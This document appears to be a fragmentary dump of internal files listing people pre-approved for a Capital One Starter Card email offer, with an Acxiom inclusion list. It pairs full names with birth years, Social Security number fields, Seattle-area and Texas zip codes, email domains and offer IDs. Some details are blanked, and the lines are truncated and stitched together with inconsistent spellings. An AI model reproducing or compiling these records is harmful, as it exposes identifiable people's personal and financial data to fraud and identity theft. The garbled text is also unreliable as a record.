./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000PNR","dateOfBirth":"1984-    "lastFourSSN":    ","firstName":"Meron","middleName":"","lastName":"A
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000QL9","dateOfBirth":"1992-    "lastFourSSN":    ","firstName":"Jordan","middleName":"L","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000QQV","dateOfBirth":"1961-    "lastFourSSN":    ","firstName":"Linda","middleName":"K","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000QWH","dateOfBirth":"1991-    "lastFourSSN":    ","firstName":"Dominique","middleName":"M","lastNam
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000TC1","dateOfBirth":"1971-    "lastFourSSN":    ","firstName":"Melissa","middleName":"D","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000UJ6","dateOfBirth":"1988-    "lastFourSSN":    ","firstName":"Kelsey","middleName":"R","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000UKV","dateOfBirth":"1980-    "lastFourSSN":    ","firstName":"Vernon","middleName":"V","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000UWU","dateOfBirth":"1995-    "lastFourSSN":    ","firstName":"Josue","middleName":"E","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000WHF","dateOfBirth":"1990-    "lastFourSSN":    ","firstName":"Hac","middleName":"","lastName":"Van
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000X3K","dateOfBirth":"1986-    "lastFourSSN":    ","firstName":"Chrisshanda","middleName":"R","lastN
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000XT3","dateOfBirth":"1996-    "lastFourSSN":    ","firstName":"Blair","middleName":"R","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000YDM","dateOfBirth":"1959-    "lastFourSSN":    ","firstName":"Carolyn","middleName":"A","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000Z49","dateOfBirth":"1976-    "lastFourSSN":    ","firstName":"Michael","middleName":"J","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"00106W","dateOfBirth":"1992-    "lastFourSSN":    ","firstName":"Jose","middleName":"","lastName":"Ga
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001I4I","dateOfBirth":"1994-    "lastFourSSN":    ","firstName":"Jaquila","middleName":"T","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001IZ2","dateOfBirth":"1993-    "lastFourSSN":    ","firstName":"Nick","middleName":"A","lastName":"V
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001LNX","dateOfBirth":"1991-    "lastFourSSN":    ","firstName":"Justin","middleName":"W","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001NJM","dateOfBirth":"1988-    "lastFourSSN":    ","firstName":"Isaias","middleName":"A","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001NV5","dateOfBirth":"1979-    "lastFourSSN":    ","firstName":"Anthony","middleName":"","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001OQ5","dateOfBirth":"1989-    "lastFourSSN":    ","firstName":"Feven","middleName":"T","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001OYC","dateOfBirth":"1986-    "lastFourSSN":    ","firstName":"Debbie","middleName":"L","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001PCA","dateOfBirth":"1979-    "lastFourSSN":    ","firstName":"Mohamed","middleName":"A","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001PDG","dateOfBirth":"1980-    "lastFourSSN":    ","firstName":"Vincent","middleName":"G","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001RSM","dateOfBirth":"1992-    "lastFourSSN":    ","firstName":"Sean","middleName":"M","lastName":"P
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001TM2","dateOfBirth":"1967-    "lastFourSSN":    ","firstName":"Mary Ann","middleName":"?","lastName
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001TQ0","dateOfBirth":"1990-    "lastFourSSN":    ","firstName":"Jennifer","middleName":"E","lastName
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001VEF","dateOfBirth":"1985-    "lastFourSSN":    ","firstName":"Kejavu","middleName":"P","lastName":

-001PCA\N\N\N404480["subjectLineEnd":", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement"]}{]{  @yahoo.com\N\N\N
R-001TM2\N\N\N404480["subjectLineEnd":", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement"]}{]{  @gmail.com\N\N\N
:"W","lastName":"Nelson","suffix":"","addrLine1":  ,"addrLine2":" ","city":"SEATTLE","state":"WA","zip":"98107","emailAddr":"  5@gmail.com","dmsCreativeId":"40447","dmsCreative
"S","lastName":"Peters","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98126","emailAddr":  @hotmail.com","dmsCreativeId":"40447","dmsCreativeV
,"lastName":"Hendrickson","suffix":"","addrLine1"  ","addrLine2":  ,"city":"HOUSTON","state":"TX","zip":"77065","emailAddr":  @gmail.com","dmsCreativeId":"40447","dm
:","lastName":"Brown","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98126","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars
:"","lastName":"Yamery","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98106","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVar
,"lastName":"Manzanares","suffix":"","addrLine1":  ,"addrLine2":"","city":"EDINBURG","state":"TX","zip":"78539","emailAddr"  @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars
:"V","lastName":"Arellano","suffix":"","addrLine1":  "addrLine2":"","city":"SEATTLE","state":"WA","zip":"98118","emailAddr":  @yahoo.com","dmsCreat
,"lastName":"Sun","suffix":"","addrLine1":  ,"addrLine2":" ","city":"SEATTLE","state":"WA","zip":"98105","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\
"G","lastName":"Mowatt","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98168","emailAddr":  @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"su
,"lastName":"Robbins","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98106","emailAddr":  @aol.com","dmsCreativeId":"40448","dmsCreativeVars":
"S","lastName":"Cockrel","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98103","emailAddr":  @gmail.com","dmsCreativeId":"40448","dmsCreativeVars
\","lastName":"Baleda","suffix":"","addrLine1":  "addrLine2":  "city":"SEATTLE","state":"WA","zip":"98109","emailAddr"  @hotmail.com","dmsCreativeId":"40448","dmsCreativeVars":
,"lastName":"Gebreberhan","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98168","emailAddr":  @yahoo.com","dmsCreativeId":"40447","dmsCreative
,"lastName":"Silvanus","suffix":"","addrLine1":  "addrLine2":  ,"city":"FORT WORTH","state":"TX","zip":"76112","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCrea
5,"lastName":"Poree","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98178","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"
"lastName":"Ortiz","suffix":"","addrLine1":  "addrLine2":  "city":"SEATTLE","state":"WA","zip":"98107","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"
","lastName":"Okamoto","suffix":"","addrLine1":  "addrLine2":"","city":"SEATTLE","state":"WA","zip":"98109","emailAddr":"  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars
,"lastName":"Afeworki","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98118","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"su
,"lastName":"Crumity","suffix":"","addrLine1":  "addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98102","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativ
,"lastName":"Woods","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98101","emailAddr":"  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars"
:"M","lastName":"Mccoy","suffix":"","addrLine1":  "addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98118","emailAddr":  @outlook.com","dmsCreativeId":"40447","d
"D","lastName":"Patterson","suffix":"","addrLine1":  "addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98146","emailAddr":"  @gmail.com","dmsCreativeId":"40448","dmsCreativeV
,"lastName":"Wolff","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98119","emailAddr":  @gmail.com","dmsCreativeId":"40448","dmsCreativeVars
","lastName":"Thompson","suffix":"","addrLine1":  "addrLine2":" ","city":"SEATTLE","state":"WA","zip":"98178","emailAddr":  @gmail.com","dmsCreativeId":"40448","dmsCreati
,"lastName":"Grados Sanchez","suffix":"","addrLine1":  addrLine2":"","city":"SEATTLE","state":"WA","zip":"98168","emailAddr":  @icloud.com","dmsCreativeId":"40448","dmsCreativ
lastName":"Yang","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98101","emailAddr":  @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"su
ae":"R","lastName":"Hoskins","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98178","emailAddr":  @gmail.com","dmsCreativeId":"40448","dm
,"lastName":"Weintraub","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98104","emailAddr":  @gmail.com","dmsCreativeId":"40448","dm
"A","lastName":"Street","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98122","emailAddr":"  @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":
"J","lastName":"Moore","suffix":"","addrLine1":  "addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98106","emailAddr":"  @icloud.com","dmsCreativeId":"40448","dmsCreativeVars":
lastName":"Garcia","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98168","emailAddr":  @yahoo.com","dmsCreativeId":"40
"T","lastName":"Sparks","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98118","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars
,"lastName":"Von Schneidau","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98118","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreative
,"lastName":"Jonson","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98122","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{
\","lastName":"Martinez","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98133","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativ
,"lastName":"Spataro","suffix":"","addrLine1":  ,"addrLine2":  "city":"SEATTLE","state":"WA","zip":"98133","emailAddr":  @gmail.com","dmsCreativeId":"40447","dmsCreativeVar
,"lastName":"Matewos","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98108","emailAddr":  @yahoo.com","dmsCreativeId":"40448","dmsCreativeVar
,"lastName":"Fola","suffix":"","addrLine1":  "addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98168","emailAddr"  @yahoo.com","dmsCreativeId":"40448","dmsCre
"A","lastName":"Sheikh","suffix":"","addrLine1":  ,"addrLine2":"\  ,"city":"SEATTLE","state":"WA","zip":"98133","emailAddr":  @yahoo.com","dmsCreativeId":"40448","dmsCreativeVa
"G","lastName":"Scotti","suffix":"","addrLine1":  ,"addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98115","emailAddr":  @hotmail.com","dmsCreativeId":"40448","dmsCreativeV
,"lastName":"Parker","suffix":"","addrLine1":  ,"addrLine2":"","city":"SEATTLE","state":"WA","zip":"98118","emailAddr":  @yahoo.com","dmsCreativeId":"40448","dmsCreativeVars":"{\
:"P","lastName":"Libed","suffix":"","addrLine1":  "addrLine2":"","city":"RENTON","state":"WA","zip":"98057","emailAddr":  @gmail.com","dmsCreativeId":"40448","dmsCreativeVar
:"E","lastName":"Schweitzer","suffix":"","addrLine1":  "addrLine2":  ,"city":"SEATTLE","state":"WA","zip":"98112","emailAddr":  @aol.com","dmsCreativeId":"40448","dms
>","lastName":"Taylor","suffix":"","addrLine1":  "addrLine2":"","city":"SEATTLE","state":"WA","zip":"98133","emailAddr":  @ymail.com","dmsCreativeId":"40448","dmsCreativeVars":

@yahoo.com\N\N\N\N
@gmail.com\N\N\N\N\N
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@hotmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
Addr":"        @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
        @yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@aol.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
)gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@yahoo.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
ddr":        @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
        @gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@outlook.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@icloud.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
        @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
ddr":        @gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@icloud.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
ilAddr        @yahoo.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40447","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@yahoo.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
dr":        .com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@yahoo.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@hotmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@yahoo.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@aol.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}
@ymail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\")","dmCreativeVars":"{}"}



./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001TQD","dateOfBirth":"1990-","lastFourSSN":"    "firstName":"Jennifer","middleName":"E","lastName":"Schweitzer","suffix":"","a
./preaprvd-eml-offers-processed/TS-inclusion-list/20180122070208_STR_007_ts-inclusion.json:{"offerId":"001VEF","dateOfBirth":"1985-","lastFourSSN":"    "firstName":"Kejavu","middleName":"P","lastName":"Taylor","suffix":"","addrLin
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17110600100.dat:Donnis P Rajski                                                               SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17110600100.dat:Timothy N Casey                                                               SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17110600100.dat:Sheryl C Gregory                                                              SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17110600100.dat:Casandra D Hilenski                                                           SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Davon A Tooke                                                                 SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Sarah Naumann                                                                 SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Viridiana Gallegos                                                            SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Nicholas A Vanschaick                                                         SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Andraw C Campbell                                                             SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Michael A Wyman                                                               SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17113000200.dat:Genaro A Alfonzo                                                              SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Semere Gebreberhan                                                            SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Anna M Silvanus                                                              FORT WORTH
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Meghan S Poree                                                                SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Kris Ortiz                                                                    SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Serena M Okamoto                                                              SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Moron Afeworki                                                                SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Jordan L Crumity                                                              SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Linda K Woods                                                                 SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Dominique M Mccoy                                                             SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Melissa D Patterson                                                           SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Kelsey R Wolff                                                                SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Vernon V Thompson                                                             SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Josue E Grados Sanchez                                                        SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Hao Yang                                                                      SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Chrisshanda R Hoskins                                                         SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Blair R Weintraub                                                             SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Carolyn A Street                                                              SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Michael J Moore                                                               SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_17120700400.dat:Jose Garcia                                                                   SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Jaquila T Sparks                                                              SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Nick A Von Schneidau                                                          SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Justin N Jonson                                                               SEATTLE
./ACXIOM-inclusion-list/COF.ACX.EML.PRD.CI_CP1_STR_18012200700.dat:Iseias A Martinez                                                             SEATTLE

"E","lastName":"Schweitzer","suffix":"","addrLine1":"[ ]    "addrLine2":[ ]    ","city":"SEATTLE","state":"WA","zip":"98112","emailAddr":"[ ]    @aol.com","dmsCreativeId":"48448","dmsCreativeVars":"{\"subjectLineEnd
","lastName":"Taylor","suffix":"","addrLine1":"[ ]    "addrLine2":[ ]    "city":"SEATTLE","state":"WA","zip":"98133","emailAddr":"[ ]    @ymail.com","dmsCreativeId":"48448","dmsCreativeVars":"{\"subjectLineEnd\":\", you are

| | | |
|---|---|---|
| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98110 | @yahoo.com |
| SEATTLE | WA98122 | @gmail.com |
| SEATTLE | WA98107 | @icloud.com |
| SEATTLE | WA98115 | @gmail.com |
| SEATTLE | WA98146 | @yahoo.com |
| SEATTLE | WA98105 | @gmail.com |
| SEATTLE | WA98106 | @gmail.com |
| SEATTLE | WA98115 | @yahoo.com |
| SEATTLE | WA98144 | @gmail.com |
| SEATTLE | WA98168 | @yahoo.com |
| FORT WORTH | TX76112 | @gmail.com |
| SEATTLE | WA98176 | @gmail.com |
| SEATTLE | WA98107 | @gmail.com |
| SEATTLE | WA98109 | @gmail.com |
| SEATTLE | WA98118 | @gmail.com |
| SEATTLE | WA98102 | @gmail.com |
| SEATTLE | WA98101 | @gmail.com |
| SEATTLE | WA98118 | @outlook.com |
| SEATTLE | WA98146 | @gmail.com |
| SEATTLE | WA98119 | @gmail.com |
| SEATTLE | WA98176 | @gmail.com |
| SEATTLE | WA98168 | @icloud.com |
| SEATTLE | WA98101 | @gmail.com |
| SEATTLE | WA98178 | @gmail.com |
| SEATTLE | WA98104 | @gmail.com |
